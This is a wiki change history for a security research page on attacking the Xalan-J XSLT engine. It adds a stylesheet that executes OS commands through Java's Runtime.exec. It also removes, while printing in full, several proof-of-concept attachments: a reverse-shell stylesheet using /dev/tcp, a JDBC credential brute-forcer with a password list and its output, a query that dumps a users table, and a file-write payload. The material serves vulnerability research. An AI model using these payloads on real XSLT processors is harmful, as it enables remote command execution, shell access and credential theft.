Changes for page Engine_XalanJ
on 2012/01/12 22:14
on 2012/01/11 23:31
Summary
-
Page properties (1 modified, 0 added, 0 removed)
-
Attachments (0 modified, 0 added, 6 removed)
Details
- Page properties
-
- Content
-
... ... @@ -22,7 +22,7 @@ 22 22 * Java properties disclosure 23 23 * Java environment disclosure 24 24 * Java code execution 25 -* OScommand execution25 +* Arbitrary command execution 26 26 * File creation 27 27 * JDBC connectivity 28 28 ... ... @@ -48,42 +48,20 @@ 48 48 |http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date: 49 49 Wed Jan 11 22:45:07 CET 2012 50 50 51 -== OS command execution ==51 +== Command execution == 52 52 53 - OnceJava code execution is possible, it is trivialtoexecute arbitraryOScommands using thejava.lang.Runtime class. The attached PoCwillnot read theoutputoftheexecuted command(because loops are hard in XSLT). But thisis nota problemif a reverse-shellhave already been started, isn't it ;-)53 +The following code will execute the command "touch /tmp/hello" : 54 54 55 -|=Namespace|=Extension functions|=PoC 56 -|http:~/~/xml.apache.org/xalan/java|split(), getRuntime(), exec() and toString()|[[xalanj-reverse-bash.xsl>>attach:xalanj-reverse-bash.xsl]] 57 - 58 -__Note__ : as arrays are not a native type in XSLT, we create one in Java via split() before passing it as an argument to [[exec(String[] cmdarray)>>http://docs.oracle.com/javase/1.4.2/docs/api/java/lang/Runtime.html#exec(java.lang.String[])||rel="__blank"]]. 59 - 60 -== File creation == 61 - 62 -The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten. 63 - 64 -|=Namespace|=Extension element|=Parameter|=PoC 65 -|http:~/~/xml.apache.org/xalan/redirect|write|file|[[xalanj-write.xsl>>attach:xalanj-write.xsl]] 66 - 67 -== JDBC connectivity == 68 - 69 -It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver. 70 - 71 -=== Simple connection === 72 - 73 -The [[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] PoC simply connects to a local MySQL database using some hard-coded credentials, executes a query and displays the result. 74 - 75 -|=Namespace|=Extension function|=PoC 76 -|org.apache.xalan.lib.sql.XConnection|new(), query() and close()|[[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] 77 - 78 -=== Credentials brute-forcing === 79 - 80 -The [[xalanj-jdbc-bruteforce.xsl>>attach:xalanj-jdbc-bruteforce.xsl]] file will read some tuples (JDBC driver, database URL, username, passsword) from a XML file ([[xalanj-jdbc-bruteforce.xml>>attach:xalanj-jdbc-bruteforce.xml]]) and try to login with each one, effectively brute-forcing credentials from the engine side (usually on the backend ;-). 81 - 82 - 83 -Here's the output when launched from the CLI : 84 - 85 -##$> java org.apache.xalan.xslt.Process -in xalanj-jdbc-bruteforce.xml -xsl xalanj-jdbc-bruteforce.xsl 2> /dev/null 86 -Username : [root] / Password : [] : 87 -Username : [root] / Password : [uberpasswd] : 88 -Username : [root] / Password : [cnam] : OK !! 89 -Username : [pma] / Password : [pma] : ## 55 +<?xml version="1.0"?> 56 +<xsl:stylesheet xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform" 57 + xmlns:j="http:~/~/xml.apache.org/xalan/java" 58 + exclude-result-prefixes="j" 59 + version="1.0"> 60 + <xsl:template match="/"> 61 + <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable> 62 + <xsl:variable name="a" select="j:split($c, ' = ')"/> 63 + <xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/> 64 + <xsl:variable name="p" select="j:exec($r, $a )"/> 65 + No content at the moment ... 66 + </xsl:template> 67 +</xsl:stylesheet>
- xalanj-java-date.xsl
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -409 bytes - Content
-
... ... @@ -1,11 +1,0 @@ 1 -<xsl:stylesheet version="1.0" 2 - xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 3 - xmlns:date="http://xml.apache.org/xalan/java/java.util.Date" 4 - exclude-result-prefixes="date"> 5 - <xsl:output method="text"/> 6 - <xsl:template match="/"> 7 - <xsl:variable name="dateObject" select="date:new()"/> 8 - <xsl:text>Current date: </xsl:text><xsl:value-of select="$dateObject"/> 9 - </xsl:template> 10 -</xsl:stylesheet> 11 -
- xalanj-jdbc-bruteforce.xml
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -775 bytes - Content
-
... ... @@ -1,35 +1,0 @@ 1 -<data> 2 - <foobar> 3 - <DBINFO> 4 - <dbdriver>com.mysql.jdbc.Driver</dbdriver> 5 - <dburl>jdbc:mysql://localhost/</dburl> 6 - <user>root</user> 7 - <password></password> 8 - </DBINFO> 9 - </foobar> 10 - <foobar> 11 - <DBINFO> 12 - <dbdriver>com.mysql.jdbc.Driver</dbdriver> 13 - <dburl>jdbc:mysql://localhost/</dburl> 14 - <user>root</user> 15 - <password>uberpasswd</password> 16 - </DBINFO> 17 - </foobar> 18 - <foobar> 19 - <DBINFO> 20 - <dbdriver>com.mysql.jdbc.Driver</dbdriver> 21 - <dburl>jdbc:mysql://localhost/</dburl> 22 - <user>root</user> 23 - <password>cnam</password> 24 - </DBINFO> 25 - </foobar> 26 - <foobar> 27 - <DBINFO> 28 - <dbdriver>com.mysql.jdbc.Driver</dbdriver> 29 - <dburl>jdbc:mysql://localhost/</dburl> 30 - <user>pma</user> 31 - <password>pma</password> 32 - </DBINFO> 33 - </foobar> 34 -</data> 35 -
- xalanj-jdbc-bruteforce.xsl
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -979 bytes - Content
-
... ... @@ -1,29 +1,0 @@ 1 -<?xml version="1.0"?> 2 - 3 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 4 - version="1.0" 5 - xmlns:sql="org.apache.xalan.lib.sql.XConnection" 6 - extension-element-prefixes="sql"> 7 - 8 -<xsl:output method="text" indent="yes"/> 9 -<xsl:variable name="query">SELECT "OK !!"</xsl:variable> 10 - 11 -<xsl:template match="//data"> 12 - <xsl:for-each select="foobar"> 13 - 14 - <xsl:variable name="cinfo" select="DBINFO"/> 15 - <xsl:variable name="user" select="DBINFO/user/text()"/> 16 - <xsl:variable name="passwd" select="DBINFO/password/text()"/> 17 - 18 - <xsl:variable name="db" select="sql:new($cinfo)"/> 19 - <xsl:variable name="data" select='sql:query($db, $query)'/> 20 - 21 - <xsl:copy-of select="concat('Username : [', $user, '] / ')" /> 22 - <xsl:copy-of select="concat('Password : [', $passwd, '] : ')" /> 23 - <xsl:copy-of select="$data" /><xsl:copy-of select="'
'" /> 24 - 25 - </xsl:for-each> 26 -</xsl:template> 27 - 28 -</xsl:stylesheet> 29 -
- xalanj-jdbc-query.xsl
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -848 bytes - Content
-
... ... @@ -1,22 +1,0 @@ 1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 2 - xmlns:sql="org.apache.xalan.lib.sql.XConnection" 3 - extension-element-prefixes="sql" 4 - version="1.0"> 5 - 6 -<xsl:output method="xml" indent="yes"/> 7 - 8 -<xsl:param name="driver" select="'com.mysql.jdbc.Driver'"/> 9 -<xsl:param name="dburl" select="'jdbc:mysql://localhost/test_db'"/> 10 -<xsl:param name="user" select="'root'"/> 11 -<xsl:param name="pass" select="'14m31337'"/> 12 -<xsl:param name="query" select="'SELECT uid,username,passwd FROM users'"/> 13 - 14 -<xsl:template match="/"> 15 - <xsl:variable name="dbh" select="sql:new($driver, $dburl, $user, $pass)"/> 16 - <xsl:variable name="table" select='sql:query($dbh, $query)'/> 17 - <xsl:copy-of select="$table" /> 18 - <xsl:value-of select="sql:close($db)"/> 19 -</xsl:template> 20 - 21 -</xsl:stylesheet> 22 -
- xalanj-reverse-bash.xsl
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -1002 bytes - Content
-
... ... @@ -1,31 +1,0 @@ 1 -<xsl:stylesheet 2 - xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 3 - xmlns:jv="http://xml.apache.org/xalan/java" 4 - exclude-result-prefixes="jv" 5 - version="1.0"> 6 - 7 - <xsl:template match="/"> 8 - 9 - <xsl:variable name="test"><![CDATA[/bin/bash ==== -c ==== /bin/bash 7<>/dev/tcp/127.0.0.1/4444 <&7 >&7]]></xsl:variable> 10 - <xsl:variable name="a" select="jv:split($test, ' ==== ')"/> 11 - <xsl:variable name="rtobject" select="jv:java.lang.Runtime.getRuntime()"/> 12 - <xsl:variable name="process" select="jv:exec($rtobject, $a )"/> 13 - 14 -Objet "String" : 15 - <xsl:value-of select="$test"/> 16 - 17 -Objet "Array" : 18 - <xsl:variable name="aAsString" select="jv:toString($a)"/> 19 - <xsl:value-of select="$aAsString"/> 20 - 21 -Objet "Runtime" : 22 - <xsl:variable name="rtobjectAsString" select="jv:toString($rtobject)"/> 23 - <xsl:value-of select="$rtobjectAsString"/> 24 - 25 -Objet "Process" : 26 - <xsl:variable name="processAsString" select="jv:toString($process)"/> 27 - <xsl:value-of select="$processAsString"/> 28 - 29 - </xsl:template> 30 -</xsl:stylesheet> 31 -
- xalanj-write.xsl
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -373 bytes - Content
-
... ... @@ -1,13 +1,0 @@ 1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 2 - xmlns:redir="http://xml.apache.org/xalan/redirect" 3 - extension-element-prefixes="redir" 4 - version='1.0'> 5 - 6 - <xsl:template match="/"> 7 - <redir:write file="/tmp/created_by_xalanj_write" method="text"> 8 - <xsl:text>Just a PoC</xsl:text> 9 - </redir:write> 10 - </xsl:template> 11 - 12 -</xsl:stylesheet> 13 -